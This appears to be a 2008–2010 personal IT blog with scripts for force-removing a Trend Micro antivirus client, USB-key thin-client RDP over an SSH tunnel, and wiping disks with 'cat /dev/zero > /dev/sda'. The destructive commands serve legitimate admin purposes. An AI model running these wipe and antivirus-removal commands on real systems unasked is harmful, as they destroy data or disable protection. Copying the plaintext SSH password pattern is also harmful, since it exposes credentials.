Observations

Trend Micro Officescan 10 Removal Script

2010-05-03T10:04:00.000-07:00

The folks at Trend Micro make a pretty nice Anti-virus tool, but like other Anti-virus vendors, they do not provide a good means of uninstalling the client.

On multiple occasions I have had clients which end up with a half-installed version of Officescan. The result is that you cannot install the client because it's all ready there. And you can't remove it, because it's not installed.

Trend Micro has an article in their knowledge base which tells you what needs done to manually uninstall the client ... but it's a lot of steps and it's no fun to repeat this across multiple workstations/servers. For that reason - I have created a batch script which performs all of the steps for you. It takes only a few seconds to run and it works like a champ! Honestly, I don't know why they don't just package this into an exe for their users and save them some brain cells.

To use my script (for Windows XP and 2003 ONLY):

1) Copy and paste the contents below into a file named "trendmicroremoval.bat".

@echo off

echo Trend Micro OfficeScan 10 client removal script!
echo by Steve Ballantyne 4/30/2010
echo Based upon: http://esupport.trendmicro.com/Pages/Uninstalling-the-OfficeScan-10-client.aspx#P140_2883
echo.
echo This script assumes that you have all ready uninstalled
echo the TrendMicro OfficeScan client from add/remove programs
echo and it did a sloppy job. If not, go in and add/remove it
echo first and then only run this if you need to!
echo.
echo This only works for OfficeScan 10, and only for XP/2003.
echo Other operating systems won't run 'devcon.exe' for the
echo device removal portion of this script. See the referenced
echo URL for the full instructions.
echo.

echo SERVICE REMOVAL
echo.

REM Stop all services
net stop "tmlisten"
net stop "tmproxy"
net stop "ntrtscan"
net stop "TMBMServer"

REM Remove the services.
sc delete "tmlisten"
sc delete "tmproxy"
sc delete "ntrtscan"
sc delete "TMBMServer"

echo.
echo PROGRAM FILES DIR REMOVAL
echo.

REM Program Files Directory.
DEL /S /F /Q "C:\Program Files\Trend Micro\"

echo.
echo REGISTRY KEYS REMOVAL
echo.

REM Registry keys GALORE.
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OfficeScanNT" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeScanNT Monitor" /F

REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ntrtscan" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmcfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmcomm" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TmFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tmlisten" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmpfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TmPreFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TmProxy" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmtdi" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSApiNt" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmlwf " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmwfp " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TMBMServer" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmevtmgr" /VA /F

REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ntrtscan" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmcfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmcomm" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TmFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tmlisten" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmpfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TmPreFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TmProxy" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmtdi" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSApiNt" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmlwf " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmwfp " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TMBMServer" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tmevtmgr" /VA /F

REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\ntrtscan" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmcfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmcomm" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TmFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tmlisten" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmpfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TmPreFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TmProxy" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmtdi" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\VSApiNt" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmlwf " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmwfp " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\TMBMServer" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\tmevtmgr" /VA /F

REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\ntrtscan" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmcfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmcomm" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\TmFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\Tmlisten" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmpfw" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\TmPreFilter" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\TmProxy" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmtdi" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\VSApiNt" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmlwf " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmwfp " /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\TMBMServer" /VA /F
REG DELETE "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\tmevtmgr" /VA /F

echo.
echo HIDDEN DEVICE REMOVAL
echo.

REM tmcomm
devcon /r remove "ROOT\LEGACY_TMCOMM\0000"
REM tmactmon
devcon /r remove "ROOT\LEGACY_TMACTMON\0000"
REM tmevtmgr
devcon /r remove "ROOT\LEGACY_TMEVTMGR\0000"
REM Trend Micro Filter ?? (not verified)
devcon /r remove "ROOT\LEGACY_TMFILTER\0000"
REM Trend Micro PreFilter ?? (not verified)
devcon /r remove "ROOT\LEGACY_TMPREFILTER\0000"
REM Trend Micro TDI Driver
devcon /r remove "ROOT\LEGACY_TMTDI\0000"
REM Trend Micro VSAPI NT ?? (not verified)
devcon /r remove "ROOT\LEGACY_VSAPINT\0000"
REM Trend Micro Unauthorized Change Prevention Service ?? (not verified)
devcon /r remove "ROOT\LEGACY_TMBMSRV\0000"
REM Trend Micro WFP Callout Driver ?? (not verified)
devcon /r remove "ROOT\LEGACY_TMWFP\0000"

echo.
echo DONE - Now try to reinstall!
echo.
PAUSE

2) Grab a copy of DEVCON from this Microsoft download page. Place the devcon.exe file next to the trendmicroremoval.bat file. This will allow the batch script to remove some hidden devices.

3) Run the batch file, and watch in awe.

4) Now you can reinstall the client (assuming that was your goal to begin with).

Did this help you? Drop me a comment!

NOTE: Devcon is what limits this script to XP/2003 only. If you are running Windows 2008, Vista, Windows 7, etc. you can still run the batch file, just not the devcon part. You would have to follow manual instructions for device removal according to the Trend Micro KB.

Thin Clients Part II - Security Added

2008-10-26T08:03:00.000-07:00

Late last week I took my little thin client computing concept a step further and added some security. My goal was to add at least one layer of security, if not two layers to this process. Like a smart card concept I wanted to have a physical token (the thumb drive itself) as well as a "secret PIN" which the user would need to supply. This might add a bit of time to the login process, but the security would be well worth it.

The New Process
We will still use an autorun.inf file which will allow the user to plug in the thumb drive and simply press enter for the default choice. The default choice, is to run a batch script which I have called "connect.bat". Here are those files.

autorun.inf

[autorun]
open=connect.bat
ACTION = LAB CONNECT

connect.bat

SET STARTRUN=%0
7za.exe e -oC:\TEMP -y RDPPACK.zip
REM COPY %0\..\*.* C:\TEMP
C:
cd C:\TEMP
start /normal ssh.bat
PING -n 8 127.0.0.1>null
start /normal RDP.bat
start /normal WAIT.bat

When connect.bat runs, it launches 7zip, which extracts a zip file to the c:\Temp directory. I used 7zip for a couple reasons: a) it's freely downloadable at http://www.7-zip.org, b) you can create password protected (encrypted) zip files with it, c) I had it installed and I all ready use it in other batch processes.

My zip file, RDPPACK.zip, is an archive which contains several other batch files. One of these batch files contains passwords so we protect the zip file by password protecting it when we create it.

My RDPPACK archive contains the following files:
labconnect.rdp - This is the file which contains RDP details such as IP and port number.
plink.exe - This is a free command line secure shell client for windows.
RDP.bat - Simple batch file to connect to the host using the settings in labconnect.rdp.
ssh.bat - This is a new batch file which uses plink.exe to open a secure shell session with our VirtualBox server.
WAIT.bat - This waits for the thumb drive to be removed, and then cleans up and kills things when that happens.

Once the zip is un-extracted (takes only a split second) we start up three other batch files simultaneously.

Here is the play by play. The user plugs in the thumb drive which runs connect.bat. This starts the file extraction which pauses momentarily and waits for the user to enter their password. In my examples I used a simple four digit "PIN Number". The files are extracted, and "ssh.bat" is launched.

ssh.bat

SET STARTRUN=%0
plink -ssh -L 13390:localhost:3390 -pw password username@10.0.46.55
EXIT

There are two items of bad news to mention here. One is that there is an EIGHT SECOND wait placed after this script runs. This is the unfortunate amount of time it takes for the secure session to be established. The other bad news is that the username and password are exposed here "in the clear". This could be hidden by putting an @ symbol in the batch script in front of that first line (keeping the command from being echoed to the user). But it will sill remain in the Temp directory while this script is running and a bad guy could find it. I would like to think that the user will not share the PIN number which revealed this information, and if their thumb drive was lost or stolen you could simply change this password on the server. So it's "pretty good" security in my book.

The plink syntax works like this: "-ssh" means to use the secure shell protocol, the "-L 13390:localhost:3390" will redirect connections that the host makes to itself on port 13390 to the server on port 3390, the "-pw password" would be this users password on the server, "username@10.0.46.55" would be the users username and the servers IP address. This means that we have created the user on the server, assigned them a password, enabled the secure shell daemon, and we are firewalled to disallow connections on port 3390. Yes, we do NOT want to allow connections to port 3390 from anybody. The only reason our remote users can do it is because they are sending these connections through the secure tunnel we established here. Clever, huh?

Once the secure session is established (we simply waited 8 seconds and assumed it's ready) we then run RDP.bat and WAIT.bat simultaneously.

RDP.bat

mstsc /f labconnect.rdp
EXIT

WAIT.bat

PING -n 10 127.0.0.1>null
GOTO CHECKEXIST

:CHECKEXIST
IF EXIST %STARTRUN% GOTO WAIT
GOTO KILLTASK

:WAIT
PING -n 3 127.0.0.1>null
GOTO CHECKEXIST

:KILLTASK
taskkill /f /im "mstsc.exe"
taskkill /f /im "plink.exe"
DEL /F C:\Temp\autorun.inf C:\Temp\connect.bat C:\Temp\labconnect.rdp C:\Temp\plink.exe C:\Temp\RDP.bat C:\Temp\ssh.bat C:\Temp\7za.exe
EXIT

RDP.bat will connect us up to the server. There were some changes made in the RDP file. That is, the client now connects to localhost:13390 instead of the server IP and port 3390.

WAIT.bat will start pinging itself in a loop, and wait for the drive to come disconnected. When that occurs, it will immediately end task on the terminal services connection, and then the secure shell tunnel. Afterward (and this is new) it does some cleaning up and deletes all that stuff that it left laying around in C:\Temp. The only thing which will remain is the WAIT.bat file itself. Which as you can see, presents no risk as it contains no passwords, etc.

Problems
I probably spent a couple of hours on this process over the span of a week. What was most frustrating was getting VirtualBox to cooperate with me. There are a few known issues with various VRDP elements. One is "authentication". Theoretically you can authenticate your VRDP sessions against a local user database on your VirtualBox server. This didn't work at all for me and after reading through a couple of forums I found that it doesn't work for anyone else either.

I am also having problems with my Windows clients when they connect to a VirtualBox at full screen. It seems that the windows get doubled up and don't display correctly. If you specify an exact window size in your RDP file such as 800x600, you will not have this problem. I went through the trouble of setting up a Windows VirtualBox server and found that the problem exists there as well. I have since opened up a Bug report with VirtualBox which I hope gets some attention.

Lastly, expect VRDP on VirtualBox to provide you with rather slow window refreshes. I would like to think that this is also something that the VirtualBox developers are improving as they have always been aware of this bug.

Hack on, and I hope that someone out there finds this information useful, at some point. ;-)

Thin Client Computing on the Cheap

2008-10-21T13:35:00.000-07:00

Many, many years ago I was attending a trade show and I saw something really cool. There was a booth set up with a couple of screens which had card readers attached to them. You could insert one of their sample cards and a screen popped up running Windows and a couple of applications. When you removed the card, it was gone. You could then walk to one of the other terminals and insert the card - and there was what you were last working on (instantly). It was pretty neat, and the concept was simple. Running on the back end was a heavy duty server which was emulating a dozen or so Windows machines. The front end was a dumbed down Linux terminal which just connected the user to the virtual Windows machines by means of a remote connection protocol (RDP). There was a little more to it, such as strong certificate based security, but we won't tackle that just yet.

My plan today was to create a collection of virtual Windows machines, and a USB "key" which could connect me to one simply by inserting it to a workstation.

The Server: In my case, this was easy since I all ready have a Linux box running VirtualBox. If you want to create this environment, go on out to VirtualBox.org and get yourself a copy. Note that it's *FREE* to those who qualify (read the fine print). Also, there is an Open Source Edition which is free to everybody, but it lacks some key features like USB support (so avoid it for this discussion). Once you have VirtualBox you will want to create at least one workstation. This can be anything really. In my case, it was Windows XP. In the settings for that workstation you will want to go into Settings and then Remote Display. Enable remote display and set your port number (default will be 3389).

The Workstation: I am referring here to the "dumb terminal" that you will be using. This should be on the same network as the server (or there should be routing established between them). Nothing needs to be done special on this workstation. It should be running Windows for our discussion. In my case I am using Windows XP boxes.

Prepare an RDP File: This can be done on any Windows machine. Basically we just want to make a settings file that we can put on our Thumb Drive. To create this, get onto a Windows PC and click Start > All Programs > Accessories > Communication > Remote Desktop Connection. Enter your IP and port number like this SERVER:3395. If you used the default port of 3389, just enter the server name. You can specify all sorts of other info here if you want. Many of these settings have no bearing since you are connecting to VirtualBox, and not "Windows itself". When you are done, choose to save your settings. Save this right onto your thumb drive and call the file "connect.rdp".

The Thumb Drive (or Jump Drive): This is where all my work came in. You will need to create a couple of batch files on the root of the thumb drive. Here is what they are named, and what should go inside of them ....

autorun.inf - This will initiate your remote client upon plugging in the Thumb Drive.

[autorun]
open=connect.bat
ACTION = LAB CONNECT

connect.bat - This is required to launch the RDP session, and the "watcher".

SET STARTRUN=%0
COPY %0\..\*.* C:\TEMP
C:
cd C:\TEMP
start /normal RDP.bat
start /normal WAIT.bat

RDP.bat - This will launch the remote window and ultimately quit.

mstsc /f connect.rdp
EXIT

wait.bat - This will watch for the removal of the thumb drive. If it's removed, the remote session is closed within 3 seconds.

GOTO CHECKEXIST

:CHECKEXIST
IF EXIST %STARTRUN% GOTO WAIT
GOTO KILLTASK

:WAIT
PING -n 3 127.0.0.1>null
GOTO CHECKEXIST

:KILLTASK
taskkill /f /im "mstsc.exe"
EXIT

With all this in place, here is how it will work.

When you insert your thumb drive, Windows XP will find the autorun.inf file and use it to launch an "Autorun list" in Windows XP. All you should have to do here is press enter (for security reasons this choice cannot be made automatically). At that point, you should see a remote connection window pop up. This whole process takes a few seconds.

While you are remotely connected, there will be two Command Prompt windows lingering in the background. One is just running the RDP application. The other is running a watch on the thumb drive. If you watch it, you will see that the PC pings itself three times, sending the result to "nowhere". The reasoning behind this is to give the PC something to do to waste time. Windows XP does not have a sleep or wait method that you might use to waste time cycles. Every time it completes it's three pings, it will check for the existence of the drive letter being used by the thumb drive. Through some clever tricks involving the "%0" variable, we are able to determine this drive letter regardless of what was chosen when it was inserted. If the drive letter is gone, the batch process hunts down the RDP task and kills it, then ends that script by exiting. The other script which had been running the RDP task moves to the next line, which tells it to exit also. The result is, the remote connection window and all it's friend vanish almost the instant the the thumb drive is removed.

You will see that my scripts first copy themselves to C:\Temp before running. The reasoning behind this was that if the drive is removed while a batch script is running from it, the script will fail and leave a "Terminate Batch" prompt on the screen. A colleague noted that in a production environment you would probably want yet another batch file in this process which removes all these items from Temp once it's done running. But it's a work in progress.

Next, I will focus on adding some form of security to this process as there presently isn't any.

Poor Mans Low Level Format

2008-10-15T11:37:00.000-07:00

On occasion I am asked to "blank out a device" or remove any data it contains. Usually this is because we are disposing of media or we are selling off equipment at the hospital which once may have contained a patients medical records. This seems to be an easy task, with a complicated solution. The goal is to "write zeroes" to the hard drive repeatedly. This is affectionately referred to as a low-level format.

Sure, there are utilities to perform this task. Some are free, while others and get quite expensive. I also seem to run into problems where certain utilities only work with certain drives (a Western Digital utility only works with Western Digital drives).

Enter the simple and free solution: Linux.

I have several different versions of Linux laying around. Old versions of Ubuntu, new versions of Xubuntu, you name it. So here is what I did.

1) Insert your live distribution of Linux, and boot to it (this may require changing BIOS options, or changing boot options).
2) Wait for the desktop to appear, or fail to appear. I was working with some bizarro medical machines today which failed to boot completely and instead dumped me into "BusyBox". BusyBox is like a small shell which can only execute very minimal commands. But this will do.
3) If you boot all the way to a graphical desktop you can either open a Terminal window, or press Ctrl+Alt+F1 to get a virtual terminal.
4) Enter this command: cat /dev/zero > /dev/sda (or /dev/hda for older IDE drives).
5) Wait for the error message, "No space left on device".

The error message is inevitable. We are simply running a contents list of an imaginary device called "zero" which is filled with an infinite amount of zeroes. Then we are redirecting that stream of zeros right into the hard drive device ignoring all boundaries, partitions, master boot records, etc. Eventually we strike the end of the drive and it tries to keep going, hence the error message.

If you want to follow the old "D.O.D. Standards" you will want to repeat this low level format at least 6 more times (if not 9 more). You can run this command repeatedly by separating your commands with semicolons. For example ...

cat /dev/zero > /dev/sda; cat /dev/zero > /dev/sda;cat /dev/zero > /dev/sda

... would perform three consecutive low level formats. Sure, you could write this into a shell script. But then we are talking about something quick and dirty here which you can do simply by booting whatever distribution of Linux you have laying around.

Disclaimer: A purist might say "That's hogwash Steve! That data is still retrievable by using a chemical separation process on the platters". To which I would say, "then take them home and prove me wrong". Yes, data could still theoretically be retrieved from these disks ... if you have a laboratory environment, or the money to pay someone retrieve it. If you are really paranoid, consider alternating between writing zeroes to the device, and writing random data to the device. This can just as easily be performed with ...

cat /dev/urandom > /dev/sda

They say that by alternating and randomizing the data that you write, recovery becomes all the more impossible.

Thinkpad x60 Booting Disaster

2008-07-02T08:03:00.000-07:00

A while back one of our doctors at the hospital bought himself a ThinkPad x60. At the time, it was about the most portable model that you could buy without sacrificing speed and extra memory. Yet - it was a ThinkPad. I will spare you the soapbox essay on why I believe that ThinkPads are crap. If you are using a ThinkPad and you you "just love it", good for you. But heed my warning: keep your stuff backed up, because your hard drive will fail in a year (or maybe sooner). And don't even get me started on the "lenovo" brand - which produced this gem. I think lenovo must translate into Chinese as "cheaply manufactured crap".

The good doctor brought me his laptop with a failed hard drive. That was no surprise. It was very well covered under warranty, but I had a hell of a time finding a number to call on the lenovo support site. IBM seemed to have disowned anything that lenovo produced, so they were not offering anything but a redirecting URL. Eventually I called a "paid support line" where I would be expected to put $70 on a credit card for a one-time support request. Knowing full well I wasn't paying a dime for something covered under warranty - I bounced around in their phone system a couple times and eventually found a live person. Lo and behold, this was the right department and they were able to send me a new drive. To their credit - it arrived less than 24 hours later.

All I had to do now was to restore the ghost image I took of the failing drive. I went through the usual process only to find that the PC was not going to boot. This was not all that shocking seeing how I imaged a failing hard drive and probably picked up a few errors along the way. All I really needed to do was to boot the Windows XP SP2 CD, and slip into the Recovery Console. From there you can run a "fixboot" and "fixmbr" to put things in order. There was just one problem ... this model has no CD-ROM drive.

Following what seems like poorly written instructions - I was able to slap together a Windows XP SP2 bootable ThumbDrive image, using this guide. While I was able to boot from the USB stick, I was not able to get past the "Setup is starting Windows" before it would blue-screen on me with a stop message. The problem seemed to be that Windows was losing itself, after having booted from the stick.

The solution to that issue ended up being to go into the BIOS of the x60 and setting the SATA option from "AHCI" to "Compatibility Mode". Not sure what that had to do with the USB boot problem, but it worked. No more blue screens. And I was able to start the Windows XP Recovery Console. But here was the other catch - by performing a "fixboot" and "fixmbr" I actually fixed the boot files of the laptop hard drive, but then BROKE the boot sector of the USB stick!

Lessons learned. Who knew that these old Recovery Console commands had arguments and switches. After rebuilding my thumb drive (there's an hour lost) I was able to get back to the Recovery Console and run both commands with a drive letter. That is, "fixboot c:" and "fixmbr c:".

Now - I am back in business with a booting, working, and updated copy of Windows XP. I went ahead and set the BIOS options back to default for the SATA controls, as I don't know if that really has any effect on how the drive is accessed. You had better believe that I am taking a ghost image of this while it's working. This hard drive will surely fail in another year or so.

Automatic Photo Resizing

2008-06-29T12:13:00.000-07:00

Last year we took a family vacation to Hatteras Island. Being the geeky guy I am, I wanted to take all of my digital photos and upload them to an online gallery while I was still vacationing. Then friends and family could see all the beautiful things that we were seeing as the trip went on. This gallery can be found here.

While I enjoyed sharing the pictures, I didn't enjoy all the time it took away from my trip. I had dragged along my old iBook for the trip and it was not very efficient at getting images off of my camera (it took an hour or more). Resizing the pictures was extremely slow due to the low processing power. Uploading the pictures was painful because the beach house had a highly unstable DSL connection which was constantly disconnecting mid-image transfer.

This year will be different! In a few weeks we will be driving out to Beavers Island Michigan on a family getaway. I will be taking along my Asus Eee PC for image transfer. This laptop has an SD Slot in the side which matches the memory card style that our camera uses. So after a long day of hanging out at the beach or taking adventurous hikes - I can take the card out of the camera and stuff it into my laptop. I will use my cell phone, and a USB connection to my laptop to provide myself "modem speed" Internet access so that I can upload my photos.

But wait - I can't upload these pictures in their native resolution (they're too big). So I wrote a script to use. This script requires that you have imagemagick installed, which can be added with "sudo apt-get install imagemagick" if you are running Debian/Ubuntu/etc.

# Image Resizing Made Fun
# http://steveballantyne.blogspot.com
#
# Set this as the path to where your picture card is/gets mounted
cameracard="/media/disk"
# If you want your resized images to have a prefix, set that here
prefix="beavermi_"
# Create a subdirectory in your home directory, which will contain
# folders with the MMDDYY directories beneath it.
subdir="to-post"
# Choose your resize percentage
resizevalue="25%"
# Create a folder under subdir with a date code in this format: MMDDYY
newdir=`date +%m%d%y`
mkdir -p $HOME/$subdir/$newdir
# Perform all the resizing work
for i in `ls $cameracard`; do convert -resize $resizevalue -quality 80 $cameracard/$i $HOME/to-post/$newdir/$prefix_$i; done

In a nutshell, it does a listing of all the pictures on my memory card. Then one by one it resizes the pictures to 25 percent of their original size, at 80 percent the quality. I am using 'convert' and not 'mogrify' here. The difference is that this will not affect the original photos. When done, I will have a folder of pictures that will be small enough to share in my online gallery.

I also wanted to script the process of uploading the pictures ... but this proved to be a bit more difficult. There are scripts out there for uploading to online galleries but none for Blogger/Picassa.

Perhaps I will work on that later.

Green Wallpapers

2008-05-22T17:02:00.000-07:00

Do you like green wallpapers? You are not alone. There seems to be an abundance of lovely chloroform laced wallpapers out there. Some of the extreme close-up photography has got me asking "did nature make that?". Whether you are just celebrating the outdoors or you are sick of that ugly field in Windows XP ... here are some green wallpapers that are sure to please.

I have linked all of these thumbnails to their homes on Interfacelift.com which features some of the most stunning photography I've ever seen. And yes, they have wallpaper in your size (including wide screen displays).

Still need more green? Try this search!

*NEW* I will be getting an EEE PC soon to use at work. If you have an EEE PC, and are looking for some nice green wallpaper, look no further. Download this zip package which includes all the above wallpaper which I have scaled and cropped to fit the 800x480 dimensions of the screen.

-Steve Ballantyne

Fun with Screenlets in Ubuntu

2008-05-20T09:03:00.000-07:00

If you're not big on eye candy, this software likely won't "do it for you". In the spirit of things that you really don't need cluttering up your desktop - I bring you "Screenlets". The idea is that a Screenlet is a desktop widget. These widgets range from things that you might want to keep at arms length, to silly gadgets that might entertain the duller moments of your day. These widgets can be "locked down" so that they become active elements of your wallpaper (more or less). If you have used Windows Vista or modern versions of OS X you should be familiar with this concept. Most folks keep their widgets floating around the right edge of their screen.

Admittedly this whole concept is growing old but I was impressed with how easy it is to install Screenlets in Ubuntu, add a collection of fun gadgets, and perhaps even create your own. Screenlets are written using the popular Python scripting engine. While I have had bad luck with similar widget engines in the past, it seems that using common libraries and Python elements has allowed the desktop widget concept to become stable and usable. I have played with these same widgets for several days and have yet to crash anything, or suffer through any error messages.

You can install Screenlets in Ubuntu with a single command in terminal:
sudo apt-get install screenlets

The above will also add all the supporting libraries, and the default "base" of Screenlets to begin using. It's likely that whatever you had in mind comes in the default Screenlet collection. If not, there are few hundred more available from http://www.screenlets.org. There's a large community of widget developers and users out there sharing their ideas.

Once you have installed Screenlets, you can begin adding your widgets using the Screenlets Manager. To access the manager, click System > Preferences > Screenlets. You may also use a "Screenlets Daemon" icon which should appear in the upper right hand corner of your display near the time and volume control slider.

Here you can select a Screenlet, and click "Add" to the right. It should immediately appear on your Desktop. From there you should be able to slide them around by clicking and dragging on them. With a right-click you will find options to change the size of the widget, decide if they should linger on top or underneath your windows, and even "lock" them into place to prevent the accidental sliding around of them. I installed a few common Screenlets and took this screen shot.

These widgets are pretty large on my desktop. The only one I really refer to often is the old analog clock. It's nice to have an analog clock, with the correct time displayed on it. We actually have three analog clocks in my department at the office. They are all battery operated, and each keep their own time. One has recently quit all together, and rather fuss with it I have decided that this clock should display "important times in nerd history". This weeks theme was Back to the Future. I'm waiting for the strike of lightning that will take Marty back to 1985.

Now, go get busy cluttering your desktop with stupid eye candy. It's time well wasted.

-Steve Ballantyne

Windows XP Service Pack 3 - Choose Your Browser

2008-05-15T12:56:00.000-07:00

Having applied the newly released Windows XP Service Pack 3 to my virtual administrative machine yesterday I can now safely say "mistakes were made". This morning I spent a good couple of hours trying to determine what went wrong, and how to correct it. I hope you can learn from my mistakes. This is what I discovered.

1) Once you install Windows XP Service Pack 3, you will never be able to change your browser. If you were running IE 6, you will be stuck with it from here until re-installation (that's a joke). If you have IE 7, you can never revert back to IE 6. That "uninstall IE 7" ability will be removed upon successful installation of Service Pack 3.

2) If you were running IE 6, and then installed SP3, you can never have IE 7. Attempts to install it manually will fail.

3) If you are stuck with IE 6, you cannot install post IE 7 updates, for which there are about three. You would think Windows Update would recognize this flaw and not attempt to install these updates that you cannot even accept, but that is not the case. If you get stuck in this loop, you will have 3 updates that are pending installation ... forever. Every time you update, it will fail. Every time. Sucks to be you.

4) If you install Windows XP right out of the box (like a normal clean install) and run through the updates that are recommended to you - you will effectively screw things up. That's because Windows Update will not offer you the IE 7 update until after you have installed SP 3 and it's too late.

With all that said - here is how you *should* update Windows XP. First, install Windows XP Service Pack 2 if it's not all ready streamlined into your product disc. Then run Windows Update and grab the dozen or so updates that are offered, and reboot. Run Windows Update again. If it offers you Service Pack 3, stop there and don't install it. Now browse to the home for IE 7 and choose to "Download Now". You want to install it manually. Once that completes, reboot. At this point you can run Windows Update and accept the Service Pack 3 update.

Hey Microsoft, what the hell are you thinking?

-Steve Ballantyne

Watch Movie DVD's in Ubuntu

2008-05-14T12:11:00.000-07:00

Due to some rather silly and lengthy legalities, Ubuntu Linux does not install in a state that allow you to watch a regular old DVD movie. I have tried without success on multiple occasions in the past to insert a disc to watch - only to have it fail. It never really occurred to me that this was "by design" and I always assumed that it must have been something I was doing wrong. Recently I found that I could play any of the movies that I had created (without encryption) but not a single commercial disc.

After some investigation I learned that you can enable the ability to watch commercial discs rather easily, but it's likely illegal (read the fine print).

Rather than act as if I came up with the solution, I am pasting a link to a pretty good article on the subject matter. While the article was written on earlier versions of Ubuntu, this trick still seems to work on the latest release (Hardy Heron).

How to enable DVD playback

-Steve Ballantyne

Scheduled and automated Secure FTP (SSL)

2008-05-13T11:03:00.000-07:00

A few months ago I had a request from one of our department members to automate a tedious process. One of our health systems crank out a plain text file which on a daily basis needs to be sent off to an insurance carrier. The insurance company uses FTP to facilitate the "upload" of data, but there is a catch. Because this information contains patient health data, you would not want to send it in plain text. Their method of securing the data is to use certificate based secure FTP. I should state that there are other methods of securing FTP traffic, namely with SSH tunneling. Using certificates for an FTP server is not common practice, and so automating it was difficult.

Here is the script that I created which happily runs on an Ubuntu Linux box. Note that names, passwords, and the like have been removed to protect confidentiality.

#!/bin/bash
#
# HL7 FTP drop
# By Steve Ballantyne  02-28-08
#

# Calculate the date in specified format and make a directory with it
TIME=`date +%m-%d-%Y`
# Build working directory
